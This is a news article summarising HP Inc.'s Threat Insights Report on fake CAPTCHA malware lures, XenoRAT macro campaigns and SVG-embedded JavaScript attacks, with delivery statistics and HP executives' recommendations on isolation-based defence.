HP Inc. has released its latest Threat Insights Report, alerting that cybercriminals have increasingly adopted fake CAPTCHA tests to deceive users into downloading malware. These deceptive practices exploit what researchers call “click tolerance,” the result of users becoming accustomed to completing multi-step authentication processes.
The findings, revealed during HP’s annual Amplify Conference, examined data from millions of endpoints protected by HP Wolf Security between October and December of 2024. The report specifically identified campaigns titled “CAPTCHA Me If You Can,” during which attackers guided unsuspecting individuals to malicious websites. There, fraudulent CAPTCHA authentication screens prompted users to inadvertently execute harmful PowerShell commands, secretly installing the Lumma Stealer remote access trojan (RAT) onto their systems.
HP Wolf Security researchers highlighted additional evolving threats such as the spread of XenoRAT, an open-source remote access trojan with advanced surveillance features, including webcam and microphone access. In these cases, attackers employed social engineering methods, luring victims into enabling macros on suspicious Word and Excel documents, facilitating activities like keystroke logging, data theft, and unauthorized remote control of affected devices.
Another notable campaign detailed in the report involved attackers embedding malicious JavaScript code within Scalable Vector Graphic (SVG) image files. Once launched within web browsers, these seemingly innocuous graphics triggered the installation of multiple malware payloads including infostealers and various RATs. Cybercriminals utilized sophisticated evasion methods, such as heavily obfuscated Python scripts, leveraging the popularity of Python among professionals in AI and data sciences fields.
According to Patrick Schläpfer, Principal Threat Researcher at HP Security Lab, a recurrent theme in these attacks is the employment of obfuscation and anti-analysis tactics. Such techniques significantly delay cyber defenses and challenge security teams by obscuring malicious activities and extending threat actors’ operational windows.
HP Wolf Security’s unique methodology, involving threat isolation within secure virtual containers, has granted deep insights into these malicious trends. Remarkably, customers protected by this technology have safely engaged with over 65 billion email attachments, webpages, and files, without experiencing breaches or successful infections.
The report further underscores vulnerabilities in traditional defenses, noting that approximately 11% of malicious emails identified by HP Sure Click had evaded conventional email gateway scanners. Executable files remain the most prevalent malware delivery method, accounting for 43% of identified incidents, followed by archive files at 32%.
Dr. Ian Pratt, Global Head of Security for Personal Systems at HP Inc., emphasized that the proliferation of multi-step authentication has increased people’s tolerance for complex, multi-click processes, making cyber-awareness training noticeably insufficient. He recommended that organizations should focus on reducing their overall attack surface by isolating potentially dangerous operations, rather than solely relying on predictions and user vigilance.
As threats evolve and AI-driven attack methods emerge, HP advises businesses to proactively implement secure isolation strategies, enhancing preventative security measures and safeguarding systems from unpredictable cyber threats.
